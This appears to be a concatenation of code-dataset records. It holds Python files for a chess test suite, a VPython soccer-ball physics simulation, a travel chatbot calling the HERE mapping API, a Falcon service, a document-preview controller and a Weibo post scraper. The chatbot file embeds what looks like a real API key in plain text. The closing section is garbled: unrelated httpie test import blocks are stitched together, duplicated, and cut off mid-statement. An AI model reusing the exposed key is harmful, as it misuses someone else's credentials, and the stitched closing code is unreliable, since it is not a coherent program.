y2), max(y1, y2) + 1) \\\n              if not racetrack.crash(((x, y), (x1, y3)), walls)]\n    else:\n        ds = [math.sqrt((x3 - x) ** 2 + (y1 - y) ** 2) \\\n              for x3 in range(min(x1, x2), max(x1, x2) + 1) \\\n              if not racetrack.crash(((x, y), (x3, y1)), walls)]\n    ds.append(infinity)\n    return min(ds)\n\n\ndef distance(p1, p2):\n    (x1, y1) = p1\n    (x2, y2) = p2\n    return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n","sub_path":"part2/heuristics.py","file_name":"heuristics.py","file_ext":"py","file_size_in_byte":4917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"147965655","text":"import unittest\nfrom datetime import timedelta\nfrom chess import Board, WHITE, BLACK\nimport rom.util\nfrom hydraChess.models import User, Game\nfrom hydraChess.config import TestingConfig\n\n\nclass TestGame(unittest.TestCase):\n    @classmethod\n    def setUpClass(cls):\n        rom.util.set_connection_settings(db=TestingConfig.REDIS_DB_ID)\n\n    def setUp(self):\n        self.used_game_ids = list()\n        self.used_user_ids = list()\n\n    def test_total_time_and_black_clock_and_white_clock(self):\n        game = Game()\n        game.save()\n        self.used_game_ids.append(game.id)\n\n        total_time = timedelta(seconds=30, microseconds=13231)\n        game.total_time = total_time\n        black_clock = timedelta(seconds=310, microseconds=321312)\n        game.black_clock = black_clock\n        white_clock = timedelta(seconds=312, microseconds=31231)\n        game.white_clock = white_clock\n\n        game.save()\n        game.refresh()\n\n        self.assertEqual(game.total_time, total_time)\n        self.assertEqual(game.black_clock, black_clock)\n        self.assertEqual(game.white_clock, white_clock)\n\n    def test_moves(self):\n        game = Game()\n        game.save()\n        self.used_game_ids.append(game.id)\n\n        moves = ['e4', 'e5', 'Nf3', 'Nc6']\n        game.moves = moves\n        game.save()\n        game.refresh()\n\n        self.assertEqual(game.moves, moves)\n\n    def test_moves_cnt_and_next_to_move_and_append_move(self):\n        game = Game()\n        game.save()\n        self.used_game_ids.append(game.id)\n\n        moves = ['e4', 'e5', 'Nf3', 'Nc6']\n\n        next_to_move = WHITE\n\n        for i in range(len(moves)):\n            self.assertEqual(game.get_moves_cnt(), i)\n            self.assertEqual(game.get_next_to_move(), next_to_move)\n\n            game.append_move(moves[i])\n            if next_to_move == WHITE:\n                next_to_move = BLACK\n            else:\n                next_to_move = WHITE\n\n        self.assertEqual(game.get_next_to_move(), next_to_move)\n        self.assertEqual(game.get_moves_cnt(), len(moves))\n        self.assertEqual(game.moves, moves)\n\n    def test_get_board(self):\n        game = Game()\n        game.save()\n        self.used_game_ids.append(game.id)\n\n        moves = ['e4', 'e5', 'Nf3', 'Nc6']\n\n        expected_board = Board()\n        for move in moves:\n            expected_board.push_san(move)\n\n        game.moves = moves\n        game.save()\n        game.refresh()\n\n        self.assertEqual(game.get_board(), expected_board)\n\n    def tearDown(self):\n        for game_id in self.used_game_ids:\n            game = Game.get(game_id)\n            game.delete()\n        self.used_game_ids.clear()\n\n        for user_id in self.used_user_ids:\n            user = User.get(user_id)\n            user.delete()\n        self.used_user_ids.clear()\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":2842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"196953992","text":"from vpython import *\r\ng = vec(0, -9.8 ,0) # g = 9.8 m/s^2\r\nsize = 0.215 /2 # ball diameter = 0.215 m, so radius = 0.1075 m\r\nweight = 0.45 #ball weight\r\nCd = 0.47 #drag coefficient\r\nCm = 0.40 #magnus coefficient\r\nCw = 0.08 #rotational friction coefficient\r\nrpm = 240 
#initial rpm\r\ndensity = 1.293\r\nviscosity = 1.81E-5\r\nv = vec(18, 9, 0)\r\nomega = rpm/60*2*pi*norm(vec(0,1,0)) #initial omega \r\nSP = size*mag(omega)/mag(v) #dimension less angular velocity\r\n\r\nclass soccer():\r\n def __init__(self, size, pos, v, rpm ,omega):\r\n self.o = sphere(radius = size, make_trail = True, trail_radius = 0.05, trail_type=\"points\",\r\n pos=pos, interval=10, texture='Soccer-ball-Texture1.jpg') \r\n self.o.v = v\r\n self.omega = omega\r\n self.radius = size\r\n self.stop = False\r\n self.rpm = rpm\r\n self.slab = label(pos= pos + vec(0,2,0), box = True)\r\n\r\ndef drag_torque(Cw, density, omega, radius):\r\n return -Cw * density/2 * (radius**5) * mag(omega) * omega\r\n\r\ndef drag_force(Cd, density, velocity, radius):\r\n return -1/2 * density * Cd * (pi*radius**2) * mag(velocity) * velocity\r\n\r\ndef magnus_force(Cm, radius, omega, velocity):\r\n return 4/3*pi*(radius**3) * (Cm*density*cross(omega,velocity))\r\n\r\n\r\nscene = canvas(width=1000, height=500, center =vec(0,0,0), background=vec(0.5,0.5,0)) # open a window\r\nfloor = box(length=40, height=0.01, width=30, color=color.blue) # the floor\r\nballs = []\r\nfor i in range(-2,6):\r\n rpm = 0 + 250*i\r\n ball = soccer(size, vec(-20, size ,0), v, rpm, rpm/60*2*pi*norm(vec(0,0,1)))\r\n balls.append(ball)\r\nstops = [False]*10\r\nscene.center = balls[4].o.pos + vec(0,2,0)\r\ndt = 0.001\r\n\r\nwhile True:\r\n rate(200)\r\n for ball in balls:\r\n if ball.o.pos.y >= ball.radius:\r\n ball.o.pos += ball.o.v*dt\r\n ball.o.v += ( drag_force(Cd, density, ball.o.v, ball.radius)/weight + magnus_force(Cm, ball.radius, ball.omega, ball.o.v)/weight + g )*dt\r\n I = 2/3*weight*ball.radius**2\r\n ball.omega += drag_torque(Cw, density, ball.omega, ball.radius)/I *dt\r\n ball.o.rotate(angle=mag(ball.omega)*dt, axis=ball.omega, origin=ball.o.pos)\r\n ball.slab.pos = ball.o.pos + vec(0,1,0)\r\n ball.slab.text = str('w:%3.0frpm'%ball.rpm)\r\n else:\r\n ball.stop = True\r\n scene.center = balls[4].o.pos + vec(0,2,0)\r\n \r\n for ball in balls:\r\n if ball.stop == False:\r\n break\r\n else:\r\n break\r\n\r\nfor ball in balls:\r\n origin = vec(-20, 0, 0)\r\n print(\"ball's rpm: %d, shift: %2.3f\"%( ball.rpm, mag(ball.o.pos - balls[3].o.pos) ))\r\n\r\n\r\n\r\n\r\n","sub_path":"physics_hw/project/magnus_omega.py","file_name":"magnus_omega.py","file_ext":"py","file_size_in_byte":2761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"601908780","text":"print(\"--IMPERATIVE\")\ncpt = 0 # global state\n\ndef count_calls():\n global cpt\n cpt += 1\n print(\"calls : {}\".format(cpt))\n\ncount_calls() # calls : 1\ncount_calls() # calls : 2\n\nprint(\"--FUNCTIONAL\")\ndef count_calls(cpt):\n new_cpt = cpt + 1\n return new_cpt\n\ncpt1 = 0\ncpt2 = count_calls(cpt1)\nprint(\"calls : {}\".format(cpt2)) # calls : 1\ncpt3 = count_calls(cpt2)\nprint(\"calls : {}\".format(cpt3)) # calls : 2\n\n\nfrom enum import Enum\n\nclass Color(Enum):\n BLACK = 1\n WHITE = 2\n\n def __repr__(self):\n return Color.STRINGS[self.value]\n\n# One peculiarity of Enums, static variables must be defined outside\n# the class\nColor.STRINGS = { 1: \"B\", 2: \"W\" }\n\nclass Board():\n # One peculiarity of keyword args, that they are references\n # defined once and for all. 
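(Python evaluates default argument values once, at function definition time.) 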
You must not copy them for fear of\n    # strange aliasing results.\n    def __init__(self, moves = None):\n        if (moves is None):\n            self.moves = []\n        else:\n            self.moves = moves\n\n    def __repr__(self):\n        return \"moves={}\".format(self.moves)\n\n    def get_move(self, color):\n        old_moves = [ m[0] for m in self.moves ]\n        if old_moves == []:\n            return [1, color]\n        else:\n            return [max(old_moves) + 1, color]\n\nprint(\"--IMPERATIVE\")\nglobal_board = Board() # global state\n\ndef play(board, color):\n    m = board.get_move(color)\n    # Modify board 'in place'\n    board.moves.append(m)\n\nprint(Color.WHITE)\nplay(global_board, Color.WHITE)\nplay(global_board, Color.BLACK)\nprint(global_board)\n\nprint(\"--FUNCTIONAL\")\ndef play(board, color):\n    m = board.get_move(color)\n    # Return new independent board\n    return Board(moves = \\\n                 board.moves + [m])\n\nboard1 = Board()\nboard2 = play(board1, Color.WHITE)\nboard3 = play(board2, Color.BLACK)\nprint(board1)\nprint(board2)\nprint(board3)\n\ndef play_rec(board, n):\n    print(board)\n    if (n == 0):\n        return board\n    else:\n        next_board = play(play(board, Color.WHITE), Color.BLACK)\n        return play_rec(next_board, n-1)\n\nplay_rec(board1, 10)\n","sub_path":"prog/prog/codes/intro/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"637171409","text":"from .root import app \nimport random\n\n@app.handle(intent='greet')\ndef welcome(request, responder):\n    responder.frame['state'] = \"get_destination_or_preferences\"\n    welcomes = random.choice([\"Hi!\", \"Hello!\", \"Hey There!\", \"Yo!\", \"Namaste!\", \"Namaskar!\"])\n    # can_ask = random.choice([\"more about some places to visit.\", \"about food and cuisine.\", \"directions.\", \"about the best places to visit\"])\n    can_ask = \" You can tell me where you want to go or what you want to experience, and I'll find something for you!\"\n    prefix = \" I am Sara, your virtual travel assistant! I'm here to help you plan your next visit to India.\"\n    responder.reply(welcomes+prefix+can_ask)\n\n@app.handle(intent='help')\ndef provide_help(request, responder):\n    \"\"\"\n    When the user asks for help, provide some sample queries they can try.\n    \"\"\"\n    # Respond with examples demonstrating what the user can ask this travel assistant.\n    # For simplicity, we have a fixed set of demonstrative queries here, but they could also be\n    # randomly sampled from a pool of example queries each time.\n    replies = [\"I can help you explore the real India! Try asking me about the best places to visit\"]\n    responder.reply(replies)\n\n@app.handle(intent='start_over')\ndef start_over(request, responder):\n    \"\"\"\n    When the user wants to start over, clear the dialogue frame and reply for the next request.\n    \"\"\"\n    if(responder.frame.get('state') == 'ask_user_for_local_culture'):\n        responder.frame['state'] = 'suggest_hotels'\n        destination = responder.frame.get('destination')\n        hotels = _get_poi_from_name(origin=destination, poi='hotels', limit='3')\n        responder.slots['hotels'] = \"\\n\".join(hotels)\n        responder.slots['destination'] = destination\n        responder.reply(\"Cool. 
Alternatively, here are some hotels at {destination}:\\n{hotels}\")\n        return\n\n    if(responder.frame.get('state') == 'confirm_for_local_culture'):\n        responder.frame['state'] = 'suggest_hotels'\n        responder.params.target_dialogue_state = 'send_accomodation'\n        destination = responder.frame.get('destination')\n        hotels = _get_poi_from_name(origin=destination, poi='hotels', limit='3')\n        responder.slots['hotels'] = \"\\n\".join(hotels)\n        responder.slots['destination'] = destination\n        responder.reply(\"Cool. Alternatively, here are some hotels at {destination}:\\n{hotels}\")\n    \n    else:\n        # Clear the dialogue frame and respond with a variation of the welcome message.\n        responder.frame = {}\n        replies = [\"Ok, let's start over!\"]\n        responder.reply(replies)\n        responder.listen()\n\n@app.handle(intent='exit')\ndef say_goodbye(request, responder):\n    \"\"\"\n    When the user ends a conversation, clear the dialogue frame and say goodbye.\n    \"\"\"\n    # Clear the dialogue frame to start afresh for the next user request.\n    responder.frame = {}\n    # Respond with a random selection from one of the canned \"goodbye\" responses.\n    responder.reply(['Bye!', 'Goodbye!', 'Have a nice day.', 'See you later.'])\n    \n@app.handle(intent='unsupported')\ndef say_unsupported(request, responder):\n    \"\"\"\n    When the user asks an unrelated question, convey the lack of understanding for the requested\n    information and prompt the user to return to travel planning.\n    \"\"\"\n    replies = [\"Sorry, I can't answer this right away! My creators are still working on this :)\"]\n    responder.reply(replies)\n\n\nimport requests, json\napiKey = 'x_QwMrXk6NkNWpdkZzTsEH1JyzETot06I-FNTd4Ur6Y'\n\ndef _get_transit_from_geocode(origin, destination):\n    \"\"\"\n    This function takes origin and destination as 'lat,long' strings\n    and returns the transit route JSON if the request succeeds, else False\n    \"\"\"\n    transit_url = 'https://transit.router.hereapi.com/v8/routes?apiKey='+apiKey\n    transit_location = '&origin='+origin+'&destination='+destination\n    response = requests.get(transit_url + transit_location)\n    if(response.status_code == 200):\n        return response.json()\n    else:\n        return False\n\ndef _get_geocode(origin, format='ll'):\n    \"\"\"\n    This function takes a location as a string param\n    and returns a geocode string if the lookup succeeds, else returns False\n    \"\"\"\n    geocode_url = 'https://geocode.search.hereapi.com/v1/geocode?apiKey='+apiKey\n    geocode_location = '&q='+ origin\n    response = requests.get(geocode_url + geocode_location)\n    try:\n        if(response.status_code == 200):\n            response = response.json()['items'][0]\n            if(format == 'll'):\n                return str(response['position']['lat'])+\",\"+str(response['position']['lng'])\n            elif(format == 'lat'):\n                return str(response['position']['lat'])\n            elif(format == 'lon'):\n                return str(response['position']['lng'])\n            else:\n                return False\n        else:\n            return False\n    except:\n        return False\n\ndef _get_poi_from_geocode(origin, poi='tourism', limit='3'):\n    \"\"\"\n    This function takes lat,long as a comma-separated string param,\n    poi or point of interest as string, defaults to tourism,\n    limit or number of results expected, defaults to 3,\n    and returns a list if the request succeeds, else returns False\n    \"\"\"\n    discover_url = 'https://discover.search.hereapi.com/v1/discover?apiKey='+apiKey\n    discover_location = '&limit='+limit+'&q='+poi+'&at='+origin\n\n    response = requests.get(discover_url + discover_location)\n    if(response.status_code == 200):\n        response = response.json()['items']\n        return response\n    else:\n        return False\n\ndef 
_get_poi_from_name(origin, poi='tourism', limit = '3'):\n    \"\"\"\n    This method takes origin as a name string,\n    poi as a string (defaults to tourism),\n    limit as a string (defaults to 3),\n    and returns a list with details of the matching POIs, at most limit entries;\n    returns False on failure\n    \"\"\"\n    # get the geocode first\n    geo_code = _get_geocode(origin)\n    if not geo_code:\n        return False\n    # get the POIs using the geocode\n    poi = _get_poi_from_geocode(geo_code, poi = poi, limit = limit)\n    if not poi:\n        return False\n    items = []\n    for one_item in poi:\n        title = one_item['address']['label']\n        try:\n            contact = (\"Contact: \" + one_item['contacts'][0]['phone'][0]['value'] + \" | Website: \" + one_item['contacts'][0]['www'][0]['value']) \n            title = (title+'\\n'+contact)\n            items.append(title)\n        except:\n            items.append(title)\n    if(items):\n        return items\n    else:\n        return False\n\ndef _get_transit_from_name(origin, destination):\n    try:\n        origin_gc = _get_geocode(origin)\n        destination_gc = _get_geocode(destination)\n        route = _get_transit_from_geocode(origin=origin_gc, destination=destination_gc)\n        sections = (route['routes'][0]['sections'])\n        directions = []\n        for section in sections:\n            try:\n                mode = section['transport']['mode'].title()\n                from_l = section['departure']['place']['name'].title() + \" (\" + section['departure']['place']['type'].title()+\")\"\n                to_l = section['arrival']['place']['name'].title() + \" (\" + section['arrival']['place']['type'].title()+\")\"\n            except:\n                mode = section['transport']['mode'].title()\n                from_l = origin.title() + \" (\"+ section['departure']['place']['type'].title()+\")\"\n                to_l = destination.title()+ \" (\" +section['arrival']['place']['type'].title()+\")\"\n            directions.append(mode+'\\n'+from_l+ ' to '+to_l)\n        return directions\n    except:\n        # return (route['notices'][0]['title'])\n        return False\n\ndef _get_routes_from_geocode(origin, destination, transportMode='car'):\n    \"\"\"\n    This method takes origin and destination as 'lat,lng' strings\n    and returns the route JSON if the request succeeds, else False\n    \"\"\"\n    routes_url = 'https://router.hereapi.com/v8/routes?apiKey='+apiKey\n    routes_location = '&transportMode='+ transportMode+'&origin='+origin+'&destination='+destination\n    response = requests.get(routes_url + routes_location)\n    if(response.status_code == 200):\n        return response.json()\n    else:\n        return False\n\ndef _get_routes_from_name(origin, destination):\n    try:\n        origin_gc = _get_geocode(origin)\n        destination_gc = _get_geocode(destination)\n        route = _get_routes_from_geocode(origin=origin_gc, destination=destination_gc)\n        sections = (route['routes'][0]['sections'])\n        directions = []\n        for section in sections:\n            try:\n                mode = section['transport']['mode'].title()\n                from_l = section['departure']['place']['name'].title() + \" | \" + section['departure']['place']['type'].title()\n                to_l = section['arrival']['place']['name'].title() + \"|\" + section['arrival']['place']['type'].title()\n            except:\n                mode = section['transport']['mode'].title()\n                from_l = origin.title() + \" (\"+ section['departure']['place']['type'].title()+\")\"\n                to_l = destination.title()+ \" (\" +section['arrival']['place']['type'].title()+\")\"\n            directions.append(mode+\"\\n\"+from_l+ \" to \"+to_l)\n        return directions\n    except:\n        # return (route['notices'][0]['title'])\n        return False\n\n","sub_path":"d_general.py","file_name":"d_general.py","file_ext":"py","file_size_in_byte":9432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"52627408","text":"'''\nGiven 
a word w, a good subsequence of w is defined as a word w' such that\n- all letters in w' are different;\n- w' is obtained from w by deleting some letters in w.\n\nReturns the list of all good subsequences, without duplicates, in lexicographic order\n(recall that the sorted() function sorts strings in lexicographic order).\n\nThe number of good sequences grows exponentially in the number of distinct letters in w,\nso the function will be tested only for cases where the latter is not too large.\n\n'''\n\n\ndef good_subsequences(word):\n '''\n >>> good_subsequences('')\n ['']\n >>> good_subsequences('aaa')\n ['', 'a']\n >>> good_subsequences('aaabbb')\n ['', 'a', 'ab', 'b']\n >>> good_subsequences('aaabbc')\n ['', 'a', 'ab', 'abc', 'ac', 'b', 'bc', 'c']\n >>> good_subsequences('aaabbaaa')\n ['', 'a', 'ab', 'b', 'ba']\n >>> good_subsequences('abbbcaaabccc')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb']\n >>> good_subsequences('abbbcaaabcccaaa')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb', 'cba']\n >>> good_subsequences('abbbcaaabcccaaabbbbbccab')\n ['', 'a', 'ab', 'abc', 'ac', 'acb', 'b', 'ba', 'bac',\\\n 'bc', 'bca', 'c', 'ca', 'cab', 'cb', 'cba']\n '''\n # Insert your code here\n if not word:\n return ['']\n first_word = word[0]\n output = []\n last_list = good_subsequences(word[1: ])\n for w in last_list:\n output.append(w)\n if not first_word in w:\n output.append(first_word + w)\n output = sorted(list(set(output)))\n #print(output)\n return output\n \n \n \n\n \n \n\n# Possibly define another function\n \n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"Final/Sample/sample_3.py","file_name":"sample_3.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"433804549","text":"import falcon\n\nfrom .handler import MetaDataHandler, UserDataHandler, StaticFileHandler\n\n\nclass RestApi(falcon.API):\n \"\"\"Falcon API service definition for this application\n\n \"\"\"\n def __init__(self, routes: dict, **kwargs):\n super(__class__, self).__init__(**kwargs)\n for route, handler in routes.items():\n self.add_route(route, handler)\n if \"/\" not in routes.keys():\n # add thin api overview handler\n self.add_route(\"/\", self)\n self.routes = routes\n\n def on_get(self, req: falcon.Request, resp: falcon.Response):\n r = self.routes.keys()\n resp.content_type = \"text/plain\"\n resp.body = \"{response_data}\\n\".format(response_data=\"\\n\".join(r))\n\ndef init_service():\n routes = {\n \"/meta-data\": MetaDataHandler(),\n \"/user-data\": UserDataHandler(),\n \"/static/{filename}\": StaticFileHandler(),\n }\n return RestApi(routes)\n","sub_path":"code/ccs/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"17272936","text":"import tg\nfrom tg import expose\nfrom tg import tmpl_context\nfrom preview_generator.exception import PreviewGeneratorException\nfrom preview_generator.manager import PreviewManager\n\nfrom tracim.config.app_cfg import CFG\nfrom tracim.controllers import TIMRestController\nfrom tracim.lib.content import ContentApi\nfrom tracim.model.data import ContentType\n\n__all__ = ['PagesController']\n\n\nclass PagesController(TIMRestController):\n\n @expose()\n def _default(self):\n return '
Error Loading Page
    '\n\n    @expose()\n    def get_all(self, *args, **kwargs):\n        file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n        return 'all the pages of document {}'.format(file_id)\n\n    # FIXME https://github.com/tracim/tracim/issues/271\n    @expose(content_type='image/jpeg')\n    def get_one(self,\n                page_id: str='-1',\n                revision_id: str=None,\n                size: int=300,\n                *args, **kwargs):\n        file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n        page = int(page_id)\n        revision_id = int(revision_id) if revision_id != 'latest' else None\n        cache_path = CFG.get_instance().PREVIEW_CACHE_DIR\n        preview_manager = PreviewManager(cache_path, create_folder=True)\n        user = tmpl_context.current_user\n        content_api = ContentApi(user,\n                                 show_archived=True,\n                                 show_deleted=True)\n        if revision_id:\n            file_path = content_api.get_one_revision_filepath(revision_id)\n        else:\n            file = content_api.get_one(file_id, self._item_type)\n            file_path = content_api.get_one_revision_filepath(file.revision_id)\n        try:\n            path = preview_manager.get_jpeg_preview(file_path=file_path,\n                                                    page=page,\n                                                    height=size,\n                                                    width=size)\n            with open(path, 'rb') as large:\n                result = large.read()\n        except PreviewGeneratorException:\n            result = None\n        return result\n\n    @expose(content_type='image/jpeg')\n    def high_quality(self,\n                     page_id: str='-1',\n                     revision_id: int=None,\n                     size: int=1000,\n                     *args, **kwargs):\n        result = self.get_one(page_id=page_id,\n                              revision_id=revision_id,\n                              size=size,\n                              args=args,\n                              kwargs=kwargs)\n        return result\n\n    @expose(content_type='application/pdf')\n    def download_pdf_full(self,\n                          page_id: str,\n                          revision_id: str='-1',\n                          *args, **kwargs):\n        return self.download_pdf_one(page_id='-1',\n                                     revision_id=revision_id,\n                                     args=args, kwargs=kwargs)\n\n    # FIXME https://github.com/tracim/tracim/issues/271\n    @expose(content_type='application/pdf')\n    def download_pdf_one(self,\n                         page_id: str,\n                         revision_id: str=None,\n                         *args, **kwargs):\n        file_id = int(tg.request.controller_state.routing_args.get('file_id'))\n        revision_id = int(revision_id) if revision_id != 'latest' else None\n        page = int(page_id)\n        cache_path = CFG.get_instance().PREVIEW_CACHE_DIR\n        preview_manager = PreviewManager(cache_path, create_folder=True)\n        user = tmpl_context.current_user\n        content_api = ContentApi(user,\n                                 show_archived=True,\n                                 show_deleted=True)\n        file = content_api.get_one(file_id, self._item_type)\n        if revision_id:\n            file_path = content_api.get_one_revision_filepath(revision_id)\n        else:\n            file = content_api.get_one(file_id, self._item_type)\n            file_path = content_api.get_one_revision_filepath(file.revision_id)\n        path = preview_manager.get_pdf_preview(file_path=file_path,\n                                               page=page)\n        file_suffix = ''\n        if page > -1:\n            file_suffix = '.page-{}'.format(page + 1)\n        tg.response.headers['Content-Disposition'] = \\\n            'attachment; filename=\"{}{}.pdf\"'.format(\n                file.label,\n                file_suffix,\n            )\n        with open(path, 'rb') as pdf:\n            return pdf.read()\n\n    @property\n    def _item_type(self):\n        return ContentType.File\n","sub_path":"tracim/tracim/controllers/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"359914465","text":"import requests\nfrom urllib.parse import urlencode\nfrom pyquery import PyQuery as pq\nimport random\nimport time\nimport csv\nimport pandas as pd\n\n# from datamanage import DataManager\n\n# instantiate the database manager object\n# db = DataManager()\n\n# empty-check helper: return the first element, or '' if the list is empty\ndef getDataFormList(temp_list):\n    if len(temp_list) > 0:\n        return temp_list[0].strip()\n    
else:\n        return ''\n\nbase_url = 'https://m.weibo.cn/api/container/getIndex?'\nheaders = {\n    'Host': 'm.weibo.cn',\n    'Referer': 'https://m.weibo.cn/u/2112738497?uid=2112738497',\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36',\n    'X-Requested-With': 'XMLHttpRequest',\n    'X-Xsrf-Token': 'a56994',\n}\n\nmax_page = 10\n\ndef get_page(page):\n    params = {\n        # 'type': 'uid',\n        # 'value': '2771423767',\n        'containerid': '1076032112738497',\n        # 'page_type': 'searchall',\n        'uid': '2112738497',\n        'page': page\n    }\n    url = base_url + urlencode(params)\n    print(url)\n    try:\n        response = requests.get(url, headers=headers)\n        print(response)\n        if response.status_code == 200:\n            # response = response.text\n            # print(type(response)) # tuple\n            return response.json(), page\n        else:\n            print(\"Request failed.\")\n    except requests.ConnectionError as e:\n        print('Error: data conversion failed', e.args)\n\ndef save_to_csv(resource_data):\n    file_name = 'dataset/blogs.csv'\n    # print(type(resource_data)) # tuple\n    resource_data = list(resource_data)\n    # print(type(resource_data)) # list\n    save = pd.DataFrame([resource_data], columns=['blog_id','creator_id','creator_nickname', 'blog_content', 'thumbnail_pic','collection_count', 'comment_count', 'repost_count', 'create_time'])\n    try:\n        save.to_csv(file_name, mode='a')\n        print(\"Write succeeded\")\n    except UnicodeEncodeError:\n        print(\"Encoding error: data conversion failed, cannot write.\")\n\ndef parse_page(json, page: int):\n    # print(json)\n    if json:\n        items = json.get('data').get('cards')\n        for index, item in enumerate(items):\n            if page == 1 and index == 1:\n                continue\n            else:\n                if item.get('mblog'):\n                    item = item.get('mblog',{})\n                else:\n                    continue\n\n            user_item = item.get('user', {})\n            blog = {}\n\n            blog['blog_id'] = item.get('id')\n            blog_id = blog['blog_id']\n\n            blog['creator_id'] = user_item.get('id')\n            creator_id = str(blog['creator_id'])\n\n            blog['creator_nickname'] = user_item.get('screen_name')\n            creator_nickname = user_item['screen_name']\n\n            blog['blog_content'] = pq(item.get('text')).text()\n            if blog['blog_content'] != '':\n                blog_content = item['text']\n            else:\n                blog_content = \"image only\"\n\n            blog['thumbnail_pic'] = str(item.get('thumbnail_pic'))\n            if blog['thumbnail_pic'] != '':\n                thumbnail_pic = blog['thumbnail_pic']\n            else:\n                thumbnail_pic = \"text only\"\n\n            blog['collection_count'] = item.get('attitudes_count')\n            collection_count = item['attitudes_count']\n\n            blog['comment_count'] = item.get('comments_count')\n            comment_count = item['comments_count']\n\n            blog['repost_count'] = item.get('reposts_count')\n            repost_count = item['reposts_count']\n\n            blog['create_time'] = item.get('created_at')\n            create_time = item['created_at']\n            yield blog\n\n            # # store the row in MySQL\n            data = (blog['blog_id'],str(blog['creator_id']),blog['creator_nickname'], blog['blog_content'], blog['thumbnail_pic'],str(blog['collection_count']), str(blog['comment_count']), str(blog['repost_count']), blog['create_time']) # this is a tuple\n            # # print(data)\n            # try:\n            #     # insert the row; skip it if it already exists\n            #     res = db.save_data(data)\n            # except Exception as e:\n            #     print('insert failed', str(e)) # log the error for the failed insert\n\n            # save to CSV\n            save_to_csv(data)\n\n\nif __name__ == '__main__':\n    for page in range(1, max_page + 1):\n        json = get_page(page)\n        print(type(json)) # tuple\n        print(*json)\n        results = parse_page(*json)\n        for result in results:\n            print(result)\n        
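# pause 1-7 seconds (randomized) before fetching the next page, to avoid hammering the API\n        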
time.sleep(random.uniform(1,7))\n","sub_path":"get_user_blogs.py","file_name":"get_user_blogs.py","file_ext":"py","file_size_in_byte":4708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"420553312","text":"\"\"\"HTTP authentication-related tests.\"\"\"\nimport mock\nimport pytest\n\nfrom utils import http, add_auth, HTTP_OK, TestEnvironment\nimport httpie.input\nimport httpie.cli\n\nimport os\nfrom tempfile import gettempdir\n\nimport pytest\n\nfrom utils import TestEnvironment, http, HTTP_OK, COLOR, CRLF\nfrom httpie import ExitStatus\nfrom httpie.compat import urlopen\nfrom httpie.output.formatters.colors import get_lexer\n\n\"\"\"High-level tests.\"\"\"\nimport pytest\n\nfrom httpie.input import ParseError\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH, FILE_CONTENT\n\nimport httpie\nfrom httpie.compat import is_py26\n\nimport os\n\nimport pytest\n\nfrom httpie.input import ParseError\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH_ARG, FILE_PATH, FILE_CONTENT\n\nimport os\nimport tempfile\n\nimport pytest\nfrom httpie.context import Environment\n\nfrom utils import TestEnvironment, http\nfrom httpie.compat import is_windows\n\n\"\"\"\nTests for the provided defaults regarding HTTP method, and --json vs. --form.\n\n\"\"\"\nfrom httpie.client import JSON_ACCEPT\nfrom utils import TestEnvironment, http, HTTP_OK\nfrom fixtures import FILE_PATH\n\n# coding=utf-8\nimport os\nimport shutil\nimport sys\nfrom tempfile import gettempdir\n\nimport pytest\n\nfrom httpie.plugins.builtin import HTTPBasicAuth\nfrom utils import TestEnvironment, mk_config_dir, http, HTTP_OK\nfrom fixtures import UNICODE\n\nfrom utils import TestEnvironment, http\n\nfrom mock import mock\n\nfrom httpie.input import SEP_CREDENTIALS\nfrom httpie.plugins import AuthPlugin, plugin_manager\nfrom utils import http, HTTP_OK\n\n# TODO: run all these tests in session mode as well\n\nUSERNAME = 'user'\nPASSWORD = 'password'\n# Basic auth encoded `USERNAME` and `PASSWORD`\n# noinspection SpellCheckingInspection\nBASIC_AUTH_HEADER_VALUE = 'Basic dXNlcjpwYXNzd29yZA=='\nBASIC_AUTH_URL = '/basic-auth/{0}/{1}'.format(USERNAME, PASSWORD)\nAUTH_OK = {'authenticated': True, 'user': USERNAME}\n\n\"\"\"Tests for dealing with binary request and response data.\"\"\"\nfrom fixtures import BIN_FILE_PATH, BIN_FILE_CONTENT, BIN_FILE_PATH_ARG\nfrom httpie.compat import urlopen\nfrom httpie.output.streams import BINARY_SUPPRESSED_NOTICE\nfrom utils import TestEnvironment, http\n\n\"\"\"High-level tests.\"\"\"\nimport pytest\n\nfrom httpie import ExitStatus\nfrom utils import http, HTTP_OK\n\nimport mock\nfrom pytest import raises\nfrom requests import Request, Timeout\nfrom requests.exceptions import ConnectionError\n\nfrom httpie import ExitStatus\nfrom httpie.core import main\n\nerror_msg = None\n\nimport os\nimport time\n\nimport pytest\nimport mock\nfrom requests.structures import 